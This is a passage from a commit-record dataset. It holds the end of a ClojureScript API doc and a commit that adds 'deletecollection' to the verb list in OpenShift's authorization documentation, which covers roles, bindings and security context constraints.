beginning, unless an\noptional starting index is supplied.\n\n==== Examples\n\n[source,clojure]\n----\n(.indexOf [1 2 3 5 7] 5) ;; 3\n(.indexOf [1 2 3 5 7] 4) ;; -1\n(.indexOf [1 2 3 5 2] 2 3) ;; 4\n----\n\n[[lastIndexOf]]\n=== lastIndexOf\n\n==== Syntax\n\n[source,clojure]\n----\n(.lastIndexOf coll search-value)\n(.lastIndexOf coll search-value from-index)\n----\n\n==== Parameters\n\n`coll` - a collection satisfying the `sequential?` predicate.\n\n`search-value` - the value to search for.\n\n`from-index` - an optional starting index.\n\n==== Description\n\nGets the last index of a value in a sequential collection, or `-1` if\nnot found. By default, search proceeds from the end, unless an\noptional starting index is supplied.\n\n==== Examples\n\n[source,clojure]\n----\n(.lastIndexOf [1 2 3 5 2 7] 2) ;; 4\n(.lastIndexOf [1 2 3 5 2 7] 4) ;; -1\n(.lastIndexOf [1 2 3 5 2 7] 2 3) ;; 1\n----\n","old_contents":"= JavaScript API\nMike Fikes\n2017-12-06\n:type: reference\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nClojureScript defines types that have stable, publicly-consumable\nJavaScript APIs as specified below.\n\n[[indexOf]]\n=== indexOf\n\n==== Syntax\n\n[source,clojure]\n----\n(.indexOf coll search-value)\n(.indexOf coll search-value from-index)\n----\n\n==== Parameters\n\n`coll` - a collection satisfying the `sequential?` predicate.\n\n`search-value` - the value to search for.\n\n`from-index` - an optional starting index.\n\n==== Description\n\nGets the index of a value in a sequential collection, or `-1` if\nnot found. By default, search proceeds from the beginning, unless an\noptional starting index is supplied.\n\n==== Examples\n\n[source,clojure]\n----\n(.indexOf [1 2 3 5 7] 5) ;; 3\n(.indexOf [1 2 3 5 7] 4) ;; -1\n(.indexOf [1 2 3 5 2] 2 3) ;; 4\n----\n\n[[lastIndexOf]]\n=== lastIndexOf\n\n==== Syntax\n\n[source,clojure]\n----\n(.lastIndexOf coll search-value)\n(.lastIndexOf coll search-value from-index)\n----\n\n==== Parameters\n\n`coll` - a collection satisfying the `sequential?` predicate.\n\n`search-value` - the value to search for.\n\n`from-index` - an optional starting index.\n\n==== Description\n\nGets the last index of a value in a sequential collection, or `-1` if\nnot found. By default, search proceeds from the end, unless an\noptional starting index is supplied.\n\n==== Examples\n\n[source,clojure]\n----\n(.lastIndexOf [1 2 3 5 2 7] 2) ;; 4\n(.lastIndexOf [1 2 3 5 2 7] 4) ;; -1\n(.lastIndexOf [1 2 3 5 2 7] 2 3) ;; 1\n----\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"08a8ad6a4875f1598226984e39cc1369805ef54c","subject":"Added deletecollection to the verb list","message":"Added deletecollection to the verb list\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"architecture\/additional_concepts\/authorization.adoc","new_file":"architecture\/additional_concepts\/authorization.adoc","new_contents":"= Authorization\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nAuthorization policies determine whether a user is allowed to perform a given\nlink:#action[action] within a project. This allows platform administrators to\nuse the link:#cluster-policy-and-local-policy[cluster policy] to control who has\nvarious access levels to the OpenShift platform itself and all projects. It also\nallows developers to use link:#cluster-policy-and-local-policy[local policy] to\ncontrol who has access to their\nlink:..\/core_concepts\/projects_and_users.html#projects[projects]. Note that\nauthorization is a separate step from link:authentication.html[authentication],\nwhich is more about determining the identity of who is taking the action.\n\nAuthorization is managed using:\n\n[cols=\"1,7\"]\n|===\n\n|[[rules-def]]*Rules* |Sets of permitted link:#action[verbs] on a set of\nlink:..\/core_concepts\/index.html[objects]. For example, whether something can\n`create` pods.\n\n|[[roles-def]]*Roles* |Collections of rules.\nlink:authentication.html#users-and-groups[Users and groups] can be associated\nwith, or _bound_ to, multiple link:#roles[roles] at the same time.\n\n|[[bindings]]*Bindings* |Associations between users and\/or groups with a\nlink:#roles[role].\n\n|===\n\nCluster administrators can visualize rules, roles, and bindings\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-roles-and-bindings[using\nthe CLI].\nendif::[]\nifdef::openshift-dedicated[]\nusing the CLI.\nendif::[]\nFor example, consider the following excerpt from viewing a policy, showing rule\nsets for the *admin* and *basic-user* link:#roles[default roles]:\n\n====\n\n[options=\"nowrap\"]\n----\nadmin\t\t\tVerbs\t\t\t\t\tResources\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tResource Names\tExtension\n\t\t\t[create delete get list update watch]\t[projects resourcegroup:exposedkube resourcegroup:exposedopenshift resourcegroup:granter secrets]\t\t\t\t[]\n\t\t\t[get list watch]\t\t\t[resourcegroup:allkube resourcegroup:allkube-status resourcegroup:allopenshift-status resourcegroup:policy]\t\t\t[]\nbasic-user\t\tVerbs\t\t\t\t\tResources\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tResource Names\tExtension\n\t\t\t[get]\t\t\t\t\t[users]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t[~]\n\t\t\t[list]\t\t\t\t\t[projectrequests]\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\n\t\t\t[list]\t\t\t\t\t[projects]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\n\t\t\t[create]\t\t\t\t[subjectaccessreviews]\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\t\tIsPersonalSubjectAccessReview\n----\n====\n\nThe following excerpt from viewing policy bindings shows the above roles bound\nto various users and groups:\n\n====\n\n[options=\"nowrap\"]\n----\nRoleBinding[admins]:\n\t\t\t\tRole:\tadmin\n\t\t\t\tUsers:\t[alice system:admin]\n\t\t\t\tGroups:\t[]\nRoleBinding[basic-user]:\n\t\t\t\tRole:\tbasic-user\n\t\t\t\tUsers:\t[joe]\n\t\t\t\tGroups:\t[devel]\n----\n====\n\nThe relationships between the the policy roles, policy bindings, users, and\ndevelopers are illustrated below.\n\nimage::authorization.png[OpenShift Authorization Policy]\n\n[[evaluating-authorization]]\n\n== Evaluating Authorization\n\nSeveral factors are combined to make the decision when OpenShift evaluates\nauthorization:\n\n[cols=\"1,7\"]\n|===\n\n|[[identity]]*Identity* |In the context of authorization, both the user name and\nlist of groups the user belongs to.\n\n|[[action]]*Action* a|The action being performed. In most cases, this consists of:\n\n[horizontal]\nProject:: The link:..\/core_concepts\/projects_and_users.html#projects[project]\nbeing accessed.\nVerb:: Can be `get`, `list`, `create`, `update`, `delete`, `deletecollection` or `watch`.\nResource Name:: The API endpoint being accessed.\n\n|*Bindings* |The full list of link:#bindings[bindings].\n\n|===\n\nOpenShift evaluates authorizations using the following steps:\n\n. The identity and the project-scoped action is used to find all bindings that\napply to the user or their groups.\n. Bindings are used to locate all the roles that apply.\n. Roles are used to find all the rules that apply.\n. The action is checked against each rule to find a match.\n. If no matching rule is found, the action is then denied by default.\n\n[[cluster-policy-and-local-policy]]\n\n== Cluster Policy and Local Policy\nThere are two levels of authorization policy:\n\n[cols=\"1,4\"]\n|===\n\n|*Cluster policy* |link:#roles[Roles] and bindings that are applicable across\nall projects. Roles that exist in the cluster policy are considered _cluster\nroles_. Cluster bindings can only reference cluster roles.\n\n|*Local policy* |link:#roles[Roles] and bindings that are scoped to a given\nproject. Roles that exist only in a local policy are considered _local roles_.\nLocal bindings can reference both cluster and local roles.\n\n|===\n\nThis two-level hierarchy allows re-usability over multiple projects through the\ncluster policy while allowing customization inside of individual projects\nthrough local policies.\n\nDuring evaluation, both the cluster bindings and the local bindings are used.\nFor example:\n\n. Cluster-wide \"allow\" rules are checked.\n. Locally-bound \"allow\" rules are checked.\n. Deny by default.\n\n[[roles]]\n\n== Roles\nRoles are collections of policy link:#rules-def[rules], which are sets of\npermitted verbs that can be performed on a set of resources. OpenShift includes\na set of default roles that can be added to users and groups in the\nlink:#cluster-policy-and-local-policy[cluster policy] or in a\nlink:#cluster-policy-and-local-policy[local policy].\n\n[cols=\"1,4\",options=\"header\"]\n|===\n\n|Default Role |Description\n\n|*admin* |A project manager. If used in a\nlink:#cluster-policy-and-local-policy[local binding], an *admin* user will have\nrights to view any resource in the project and modify any resource in the\nproject except for role creation and quota. If the *cluster-admin* wants to\nallow an *admin* to modify roles, the *cluster-admin* must create a\nproject-scoped `*Policy*` object using JSON.\n\n|*basic-user* |A user that can get basic information about projects and users.\n\n|*cluster-admin* |A super-user that can perform any action in any project. When\ngranted to a user within a local policy, they have full control over quota and\nroles and every action on every resource in the project.\n\n|*cluster-status* |A user that can get basic cluster status information.\n\n|*edit* |A user that can modify most objects in a project, but does not have the\npower to view or modify roles or bindings.\n\n|*self-provisioner* |A user that can create their own projects.\n\n|*view* |A user who cannot make any modifications, but can see most objects in a\nproject. They cannot view or modify roles or bindings.\n\n|===\n\nTIP: Remember that link:authentication.html#users-and-groups[users\nand groups] can be associated with, or _bound_ to, multiple roles at the same\ntime.\n\nCluster administrators can visualize these roles, including a matrix of the\nverbs and resources each are associated using the CLI to\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-cluster-roles[view\nthe cluster roles].\nendif::[]\nifdef::openshift-dedicated[]\nview the cluster roles.\nendif::[]\nAdditional *system:* roles are listed as well, which\nare used for various OpenShift system and component operations.\n\nBy default in a local policy, only the binding for the *admin* role is\nimmediately listed when using the CLI to\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-local-bindings[view\nlocal bindings].\nendif::[]\nifdef::openshift-dedicated[]\nview local bindings.\nendif::[]\nHowever, if other default roles are added to users and groups within a local\npolicy, they become listed in the CLI output, as well.\n\nIf you find that these roles do not suit you, a *cluster-admin* user can create\na `*policyBinding*` object named `_<projectname>_:default` with the CLI using a\nJSON file. This allows the project *admin* to bind users to roles that are\ndefined only in the `_<projectname>_` local policy.\n\nifdef::openshift-enterprise,openshift-origin[]\n[[updating-cluster-roles]]\n\n=== Updating Cluster Roles\n\nAfter any link:..\/..\/install_config\/upgrading\/index.html[OpenShift cluster\nupgrade], the recommended default roles may have been updated. See\nlink:..\/..\/install_config\/upgrading\/manual_upgrades.html#updating-policy-definitions[Updating\nPolicy Definitions] for instructions on getting to the new recommendations\nusing:\n\n----\n$ oadm policy reconcile-cluster-roles\n----\nendif::[]\n\n[[security-context-constraints]]\n\n== Security Context Constraints\nIn addition to link:#overview[authorization policies] that control what a user\ncan do, OpenShift provides _security context constraints_ (SCC) that control the\nactions that a link:..\/core_concepts\/pods_and_services.html#pods[pod] can\nperform and what it has the ability to access. Administrators can\nlink:..\/..\/admin_guide\/manage_scc.html[manage SCCs] using the CLI.\nSCCs are also very useful for\nlink:..\/..\/install_config\/persistent_storage\/pod_security_context.html[managing\naccess to persistent storage].\n\nSCCs are objects that define a set of conditions that a pod must run with in\norder to be accepted into the system. They allow an administrator to control the\nfollowing:\n\nifdef::openshift-enterprise,openshift-origin[]\n. Running of\nlink:..\/..\/install_config\/install\/prerequisites.html#security-warning[privileged\ncontainers].\nendif::[]\nifdef::openshift-dedicated[]\n. Running of privileged containers.\nendif::[]\n. Capabilities a container can request to be added.\n. Use of host directories as volumes.\n. The SELinux context of the container.\n. The user ID.\n. The use of host namespaces and networking.\n. Allocating an `*FSGroup*` that owns the pod's volumes\n. Configuring allowable supplemental groups\n\nSix SCCs are added to the cluster by default, and are viewable by cluster\nadministrators using the CLI:\n\n====\n----\n$ oc get scc\nNAME PRIV CAPS HOSTDIR SELINUX RUNASUSER FSGROUP SUPGROUP PRIORITY\nanyuid false [] false MustRunAs RunAsAny RunAsAny RunAsAny 10\nhostaccess false [] true MustRunAs MustRunAsRange RunAsAny RunAsAny <none>\nhostmount-anyuid false [] true MustRunAs RunAsAny RunAsAny RunAsAny <none>\nnonroot false [] false MustRunAs MustRunAsNonRoot RunAsAny RunAsAny <none>\nprivileged true [] true RunAsAny RunAsAny RunAsAny RunAsAny <none>\nrestricted false [] false MustRunAs MustRunAsRange RunAsAny RunAsAny <none>\n----\n====\n\nThe definition for each SCC is also viewable by cluster administrators using the\nCLI. For example, for the privileged SCC:\n\n====\n----\n# oc export scc\/privileged\n\nallowHostDirVolumePlugin: true\nallowHostIPC: true\nallowHostNetwork: true\nallowHostPID: true\nallowHostPorts: true\nallowPrivilegedContainer: true\nallowedCapabilities: null\napiVersion: v1\nfsGroup: <1>\n type: RunAsAny\ngroups: <2>\n- system:cluster-admins\n- system:nodes\nkind: SecurityContextConstraints\nmetadata:\n annotations:\n kubernetes.io\/description: 'privileged allows access to all privileged and host\n features and the ability to run as any user, any group, any fsGroup, and with\n any SELinux context. WARNING: this is the most relaxed SCC and should be used\n only for cluster administration. Grant with caution.'\n creationTimestamp: null\n name: privileged\npriority: null\nrunAsUser: <3>\n type: RunAsAny\nseLinuxContext: <4>\n type: RunAsAny\nsupplementalGroups: <5>\n type: RunAsAny\nusers: <6>\n- system:serviceaccount:default:registry\n- system:serviceaccount:default:router\n- system:serviceaccount:openshift-infra:build-controller\n----\n\n<1> The `*FSGroup*` strategy which dictates the allowable values for the\nSecurity Context\n<2> The groups that have access to this SCC\n<3> The run as user strategy type which dictates the allowable values for the\nSecurity Context\n<4> The SELinux context strategy type which dictates the allowable values for\nthe Security Context\n<5> The supplemental groups strategy which dictates the allowable supplemental\ngroups for the Security Context\n<6> The users who have access to this SCC\n\n====\n\nThe `*users*` and `*groups*` fields on the SCC control which SCCs can be used.\nBy default, cluster administrators, nodes, and the build controller are granted\naccess to the privileged SCC. All authenticated users are granted access to the\nrestricted SCC.\n\nThe privileged SCC:\n\n- allows privileged pods.\n- allows host directories to be mounted as volumes.\n- allows a pod to run as any user.\n- allows a pod to run with any MCS label.\n- allows a pod to use the host's IPC namespace.\n- allows a pod to use the host's PID namespace.\n- allows a pod to use any FSGroup.\n- allows a pod to use any supplemental group.\n\nThe restricted SCC:\n\n- ensures pods cannot run as privileged.\n- ensures pods cannot use host directory volumes.\n- requires that a pod run as a user in a pre-allocated range of UIDs.\n- requires that a pod run with a pre-allocated MCS label.\n- allows a pod to use any FSGroup.\n- allows a pod to use any supplemental group.\n\n[NOTE]\n====\nFor more information about each SCC, see the *kubernetes.io\/description*\nannotation available on the SCC.\n====\n\nSCCs are comprised of settings and strategies that control the security features\na pod has access to. These settings fall into three categories:\n\n[cols=\"1,4\"]\n|===\n\n|*Controlled by a boolean*\n|Fields of this type default to the most restrictive value. For example,\n`*AllowPrivilegedContainer*` is always set to *false* if unspecified.\n\n|*Controlled by an allowable set*\n|Fields of this type are checked against the set to ensure their value is\nallowed.\n\n|*Controlled by a strategy*\na|Items that have a strategy to generate a value provide:\n\n- A mechanism to generate the value, and\n- A mechanism to ensure that a specified value falls into the set of allowable\nvalues.\n\n|===\n\n=== SCC Strategies\n\n==== RunAsUser\n\n. *MustRunAs* - Requires a `*runAsUser*` to be configured. Uses the configured\n`*runAsUser*` as the default. Validates against the configured `*runAsUser*`.\n. *MustRunAsRange* - Requires minimum and maximum values to be defined if not\nusing pre-allocated values. Uses the minimum as the default. Validates against\nthe entire allowable range.\n. *MustRunAsNonRoot* - Requires that the pod be submitted with a non-zero\n`*runAsUser*` or have the `USER` directive defined in the image. No default\nprovided.\n. *RunAsAny* - No default provided. Allows any `*runAsUser*` to be specified.\n\n==== SELinuxContext\n\n. *MustRunAs* - Requires `*seLinuxOptions*` to be configured if not using\npre-allocated values. Uses `*seLinuxOptions*` as the default. Validates against\n`*seLinuxOptions*`.\n. *RunAsAny* - No default provided. Allows any `*seLinuxOptions*` to be\nspecified.\n\n==== SupplementalGroups\n\n. *MustRunAs* - Requires at least one range to be specified if not using\npre-allocated values. Uses the minimum value of the first range as the default.\nValidates against all ranges.\n. *RunAsAny* - No default provided. Allows any `*supplementalGroups*` to be\nspecified.\n\n==== FSGroup\n\n. *MustRunAs* - Requires at least one range to be specified if not using\npre-allocated values. Uses the minimum value of the first range as the default.\nValidates against the first ID in the first range.\n. *RunAsAny* - No default provided. Allows any `*fsGroup*` ID to be specified.\n\n\n[[admission]]\n\n=== Admission\n_Admission control_ with SCCs allows for control over the creation of resources\nbased on the capabilities granted to a user.\n\nIn terms of the SCCs, this means that an admission controller can inspect the\nuser information made available in the context to retrieve an appropriate set of\nSCCs. Doing so ensures the pod is authorized to make requests about its\noperating environment or to generate a set of constraints to apply to the pod.\n\nThe set of SCCs that admission uses to authorize a pod are determined by the\nuser identity and groups that the user belongs to. Additionally, if the pod\nspecifies a service account, the set of allowable SCCs includes any constraints\naccessible to the service account.\n\nAdmission uses the following approach to create the final security context for\nthe pod:\n\n. Retrieve all SCCs available for use.\n. Generate field values for security context settings that were not specified\non the request.\n. Validate the final settings against the available constraints.\n\nIf a matching set of constraints is found, then the pod is accepted. If the\nrequest cannot be matched to an SCC, the pod is rejected.\n\nA pod must validate every field against the SCC. The following are examples for\njust two of the fields that must be validated:\n\n[NOTE]\n====\nThese examples are in the context of a strategy using the preallocated values.\n====\n\n*A FSGroup SCC Strategy of MustRunAs*\n\nIf the pod defines a `*fsGroup*` ID, then that ID must equal the default\n`*FSGroup*` ID. Otherwise, the pod is not validated by that SCC and the next SCC\nis evaluated. If the `*FSGroup*` strategy is *RunAsAny* and the pod omits a\n`*fsGroup*` ID, then the pod matches the SCC based on `*FSGroup*` (though other\nstrategies may not validate and thus cause the pod to fail).\n\n*A SupplementalGroups SCC Strategy of MustRunAs*\n\nIf the pod specification defines one or more `*SupplementalGroups*` IDs, then\nthe pod's IDs must equal one of the IDs in the namespace's\n*openshift.io\/sa.scc.supplemental-groups* annotation. Otherwise, the pod is not\nvalidated by that SCC and the next SCC is evaluated. If the\n`*SupplementalGroups*` setting is *RunAsAny* and the pod specification omits a\n`*SupplementalGroups*` ID, then the pod matches the SCC based on\n`*SupplementalGroups*` (though other strategies may not validate and thus cause\nthe pod to fail).\n\n==== SCC Prioritization\n\nSCCs have a priority field that affects the ordering when attempting to\nvalidate a request by the admission controller. A higher priority\nSCC is moved to the front of the set when sorting. When the complete set\nof available SCCs are determined they are ordered by:\n\n. Highest priority first, nil is considered a 0 priority\n. If priorities are equal, the SCCs will be sorted from most restrictive to least restrictive\n. If both priorities and restrictions are equal the SCCs will be sorted by name\n\nBy default, the anyuid SCC granted to cluster administrators is given priority\nin their SCC set. This allows cluster administrators to run pods as any\nuser by without specifying a `RunAsUser` on the pod's `SecurityContext`. The\nadministrator may still specify a `RunAsUser` if they wish.\n\n==== Understanding Pre-allocated Values and Security Context Constraints\n\nThe admission controller is aware of certain conditions in the security context\nconstraints that trigger it to look up pre-allocated values from a namespace and\npopulate the security context constraint before processing the pod. Each SCC\nstrategy is evaluated independently of other strategies, with the pre-allocated\nvalues (where allowed) for each policy aggregated with pod specification values\nto make the final values for the various IDs defined in the running pod.\n\nThe following SCCs cause the admission controller to look for pre-allocated\nvalues when no ranges are defined in the pod specification:\n\n. A `*RunAsUser*` strategy of *MustRunAsRange* with no minimum or maximum set.\nAdmission looks for the *openshift.io\/sa.scc.uid-range* annotation to populate\nrange fields.\n. An `*SELinuxContext*` strategy of *MustRunAs* with no level set. Admission\nlooks for the *openshift.io\/sa.scc.mcs* annotation to populate the level.\n. A `*FSGroup*` strategy of *MustRunAs*. Admission looks for the\n*openshift.io\/sa.scc.supplemental-groups* annotation.\n. A `*SupplementalGroups*` strategy of *MustRunAs*. Admission looks for the\n*openshift.io\/sa.scc.supplemental-groups* annotation.\n\nDuring the generation phase, the security context provider will default any\nvalues that are not specifically set in the pod. Defaulting is based on the\nstrategy being used:\n\n. `*RunAsAny*` and `*MustRunAsNonRoot*` strategies do not provide default\nvalues. Thus, if the pod needs a field defined (for example, a group ID), this\nfield must be defined inside the pod specification.\n. `*MustRunAs*` (single value) strategies provide a default value which is\nalways used. As an example, for group IDs: even if the pod specification defines\nits own ID value, the namespace's default field will also appear in the pod's\ngroups.\n. `*MustRunAsRange*` and `*MustRunAs*` (range-based) strategies provide the\nminimum value of the range. As with a single value `*MustRunAs*` strategy, the\nnamespace's default value will appear in the running pod. If a range-based\nstrategy is configurable with multiple ranges, it will provide the minimum value\nof the first configured range.\n\n[NOTE]\n====\n`*FSGroup*` and `*SupplementalGroups*` strategies fall back to the\n*openshift.io\/sa.scc.uid-range* annotation if the\n*openshift.io\/sa.scc.supplemental-groups* annotation does not exist on the\nnamespace. If neither exist, the SCC will fail to create.\n====\n\n[NOTE]\n====\nBy default, the annotation-based `*FSGroup*` strategy configures itself with a\nsingle range based on the minimum value for the annotation. For example, if your\nannotation reads *1\/3*, the `*FSGroup*` strategy will configure itself with a\nminimum and maximum of *1*. If you want to allow more groups to be accepted for\nthe `*FSGroup*` field, you can configure a custom SCC that does not use the\nannotation.\n====\n\n[NOTE]\n====\nThe *openshift.io\/sa.scc.supplemental-groups* annotation accepts a comma\ndelimited list of blocks in the format of `<start>\/<length` or `<start>-<end>`.\nThe *openshift.io\/sa.scc.uid-range* annotation accepts only a single block.\n====\n","old_contents":"= Authorization\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nAuthorization policies determine whether a user is allowed to perform a given\nlink:#action[action] within a project. This allows platform administrators to\nuse the link:#cluster-policy-and-local-policy[cluster policy] to control who has\nvarious access levels to the OpenShift platform itself and all projects. It also\nallows developers to use link:#cluster-policy-and-local-policy[local policy] to\ncontrol who has access to their\nlink:..\/core_concepts\/projects_and_users.html#projects[projects]. Note that\nauthorization is a separate step from link:authentication.html[authentication],\nwhich is more about determining the identity of who is taking the action.\n\nAuthorization is managed using:\n\n[cols=\"1,7\"]\n|===\n\n|[[rules-def]]*Rules* |Sets of permitted link:#action[verbs] on a set of\nlink:..\/core_concepts\/index.html[objects]. For example, whether something can\n`create` pods.\n\n|[[roles-def]]*Roles* |Collections of rules.\nlink:authentication.html#users-and-groups[Users and groups] can be associated\nwith, or _bound_ to, multiple link:#roles[roles] at the same time.\n\n|[[bindings]]*Bindings* |Associations between users and\/or groups with a\nlink:#roles[role].\n\n|===\n\nCluster administrators can visualize rules, roles, and bindings\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-roles-and-bindings[using\nthe CLI].\nendif::[]\nifdef::openshift-dedicated[]\nusing the CLI.\nendif::[]\nFor example, consider the following excerpt from viewing a policy, showing rule\nsets for the *admin* and *basic-user* link:#roles[default roles]:\n\n====\n\n[options=\"nowrap\"]\n----\nadmin\t\t\tVerbs\t\t\t\t\tResources\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tResource Names\tExtension\n\t\t\t[create delete get list update watch]\t[projects resourcegroup:exposedkube resourcegroup:exposedopenshift resourcegroup:granter secrets]\t\t\t\t[]\n\t\t\t[get list watch]\t\t\t[resourcegroup:allkube resourcegroup:allkube-status resourcegroup:allopenshift-status resourcegroup:policy]\t\t\t[]\nbasic-user\t\tVerbs\t\t\t\t\tResources\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tResource Names\tExtension\n\t\t\t[get]\t\t\t\t\t[users]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t[~]\n\t\t\t[list]\t\t\t\t\t[projectrequests]\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\n\t\t\t[list]\t\t\t\t\t[projects]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\n\t\t\t[create]\t\t\t\t[subjectaccessreviews]\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\t\tIsPersonalSubjectAccessReview\n----\n====\n\nThe following excerpt from viewing policy bindings shows the above roles bound\nto various users and groups:\n\n====\n\n[options=\"nowrap\"]\n----\nRoleBinding[admins]:\n\t\t\t\tRole:\tadmin\n\t\t\t\tUsers:\t[alice system:admin]\n\t\t\t\tGroups:\t[]\nRoleBinding[basic-user]:\n\t\t\t\tRole:\tbasic-user\n\t\t\t\tUsers:\t[joe]\n\t\t\t\tGroups:\t[devel]\n----\n====\n\nThe relationships between the the policy roles, policy bindings, users, and\ndevelopers are illustrated below.\n\nimage::authorization.png[OpenShift Authorization Policy]\n\n[[evaluating-authorization]]\n\n== Evaluating Authorization\n\nSeveral factors are combined to make the decision when OpenShift evaluates\nauthorization:\n\n[cols=\"1,7\"]\n|===\n\n|[[identity]]*Identity* |In the context of authorization, both the user name and\nlist of groups the user belongs to.\n\n|[[action]]*Action* a|The action being performed. In most cases, this consists of:\n\n[horizontal]\nProject:: The link:..\/core_concepts\/projects_and_users.html#projects[project]\nbeing accessed.\nVerb:: Can be `get`, `list`, `create`, `update`, `delete`, or `watch`.\nResource Name:: The API endpoint being accessed.\n\n|*Bindings* |The full list of link:#bindings[bindings].\n\n|===\n\nOpenShift evaluates authorizations using the following steps:\n\n. The identity and the project-scoped action is used to find all bindings that\napply to the user or their groups.\n. Bindings are used to locate all the roles that apply.\n. Roles are used to find all the rules that apply.\n. The action is checked against each rule to find a match.\n. If no matching rule is found, the action is then denied by default.\n\n[[cluster-policy-and-local-policy]]\n\n== Cluster Policy and Local Policy\nThere are two levels of authorization policy:\n\n[cols=\"1,4\"]\n|===\n\n|*Cluster policy* |link:#roles[Roles] and bindings that are applicable across\nall projects. Roles that exist in the cluster policy are considered _cluster\nroles_. Cluster bindings can only reference cluster roles.\n\n|*Local policy* |link:#roles[Roles] and bindings that are scoped to a given\nproject. Roles that exist only in a local policy are considered _local roles_.\nLocal bindings can reference both cluster and local roles.\n\n|===\n\nThis two-level hierarchy allows re-usability over multiple projects through the\ncluster policy while allowing customization inside of individual projects\nthrough local policies.\n\nDuring evaluation, both the cluster bindings and the local bindings are used.\nFor example:\n\n. Cluster-wide \"allow\" rules are checked.\n. Locally-bound \"allow\" rules are checked.\n. Deny by default.\n\n[[roles]]\n\n== Roles\nRoles are collections of policy link:#rules-def[rules], which are sets of\npermitted verbs that can be performed on a set of resources. OpenShift includes\na set of default roles that can be added to users and groups in the\nlink:#cluster-policy-and-local-policy[cluster policy] or in a\nlink:#cluster-policy-and-local-policy[local policy].\n\n[cols=\"1,4\",options=\"header\"]\n|===\n\n|Default Role |Description\n\n|*admin* |A project manager. If used in a\nlink:#cluster-policy-and-local-policy[local binding], an *admin* user will have\nrights to view any resource in the project and modify any resource in the\nproject except for role creation and quota. If the *cluster-admin* wants to\nallow an *admin* to modify roles, the *cluster-admin* must create a\nproject-scoped `*Policy*` object using JSON.\n\n|*basic-user* |A user that can get basic information about projects and users.\n\n|*cluster-admin* |A super-user that can perform any action in any project. When\ngranted to a user within a local policy, they have full control over quota and\nroles and every action on every resource in the project.\n\n|*cluster-status* |A user that can get basic cluster status information.\n\n|*edit* |A user that can modify most objects in a project, but does not have the\npower to view or modify roles or bindings.\n\n|*self-provisioner* |A user that can create their own projects.\n\n|*view* |A user who cannot make any modifications, but can see most objects in a\nproject. They cannot view or modify roles or bindings.\n\n|===\n\nTIP: Remember that link:authentication.html#users-and-groups[users\nand groups] can be associated with, or _bound_ to, multiple roles at the same\ntime.\n\nCluster administrators can visualize these roles, including a matrix of the\nverbs and resources each are associated using the CLI to\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-cluster-roles[view\nthe cluster roles].\nendif::[]\nifdef::openshift-dedicated[]\nview the cluster roles.\nendif::[]\nAdditional *system:* roles are listed as well, which\nare used for various OpenShift system and component operations.\n\nBy default in a local policy, only the binding for the *admin* role is\nimmediately listed when using the CLI to\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-local-bindings[view\nlocal bindings].\nendif::[]\nifdef::openshift-dedicated[]\nview local bindings.\nendif::[]\nHowever, if other default roles are added to users and groups within a local\npolicy, they become listed in the CLI output, as well.\n\nIf you find that these roles do not suit you, a *cluster-admin* user can create\na `*policyBinding*` object named `_<projectname>_:default` with the CLI using a\nJSON file. This allows the project *admin* to bind users to roles that are\ndefined only in the `_<projectname>_` local policy.\n\nifdef::openshift-enterprise,openshift-origin[]\n[[updating-cluster-roles]]\n\n=== Updating Cluster Roles\n\nAfter any link:..\/..\/install_config\/upgrading\/index.html[OpenShift cluster\nupgrade], the recommended default roles may have been updated. See\nlink:..\/..\/install_config\/upgrading\/manual_upgrades.html#updating-policy-definitions[Updating\nPolicy Definitions] for instructions on getting to the new recommendations\nusing:\n\n----\n$ oadm policy reconcile-cluster-roles\n----\nendif::[]\n\n[[security-context-constraints]]\n\n== Security Context Constraints\nIn addition to link:#overview[authorization policies] that control what a user\ncan do, OpenShift provides _security context constraints_ (SCC) that control the\nactions that a link:..\/core_concepts\/pods_and_services.html#pods[pod] can\nperform and what it has the ability to access. Administrators can\nlink:..\/..\/admin_guide\/manage_scc.html[manage SCCs] using the CLI.\nSCCs are also very useful for\nlink:..\/..\/install_config\/persistent_storage\/pod_security_context.html[managing\naccess to persistent storage].\n\nSCCs are objects that define a set of conditions that a pod must run with in\norder to be accepted into the system. They allow an administrator to control the\nfollowing:\n\nifdef::openshift-enterprise,openshift-origin[]\n. Running of\nlink:..\/..\/install_config\/install\/prerequisites.html#security-warning[privileged\ncontainers].\nendif::[]\nifdef::openshift-dedicated[]\n. Running of privileged containers.\nendif::[]\n. Capabilities a container can request to be added.\n. Use of host directories as volumes.\n. The SELinux context of the container.\n. The user ID.\n. The use of host namespaces and networking.\n. Allocating an `*FSGroup*` that owns the pod's volumes\n. Configuring allowable supplemental groups\n\nSix SCCs are added to the cluster by default, and are viewable by cluster\nadministrators using the CLI:\n\n====\n----\n$ oc get scc\nNAME PRIV CAPS HOSTDIR SELINUX RUNASUSER 